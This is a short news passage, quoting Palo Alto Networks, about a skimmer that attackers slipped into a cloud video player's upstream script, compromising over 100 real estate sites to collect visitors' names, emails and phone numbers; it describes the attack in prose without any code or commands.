“With Palo Alto Networks proactive monitoring and detection services, we detected over 100 real estate sites that were compromised by the same skimmer attack,” Palo Alto writes.
The threat actors used this function by providing a script that could be updated upstream, allowing them to inject malicious content after the player was built. “We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player,” Palo Alto Networks notes.
“From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server”.
Palo Alto Networks claims that the skimmer is highly polymorphic, mysterious, and ever-changing. A skimmer of this sort might have a huge impact when paired with cloud distribution platforms.